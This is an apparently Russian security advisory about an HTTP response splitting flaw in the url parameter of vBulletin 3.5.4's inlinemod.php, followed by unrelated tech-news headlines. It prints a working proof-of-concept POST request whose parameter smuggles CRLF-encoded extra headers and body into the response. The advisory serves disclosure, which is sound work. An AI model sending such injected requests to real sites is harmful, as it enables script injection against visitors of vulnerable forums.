Навигация
Главная »  Интернет 

Уязвимость HTTP Response Splitting в vBulletin


Программа: vBulletin 3.5.4
Опасность: Низкая
Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded
do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0aHacked!%0d%0a%0d%0a

Уязвимость обнаружил Агиевич Игорь aka Shanker (shanker@mail.ru)

URL производителя: http://www.vbulletin.com

 

 Internet Explorer 7 будет распространяться через автоматические обновления.
 Вышла русская версия K-meleon 1.0.
 Аналитики предупреждают об атаке VoIP-спамеров.
 Защитой Firefoх занимается уволенная из Microsoft cотрудница.
 Множественные уязвимости в Mozilla Firefox.


Главная »  Интернет 

© 2017 Team.Furia.Ru.
Частичное копирование материалов разрешено.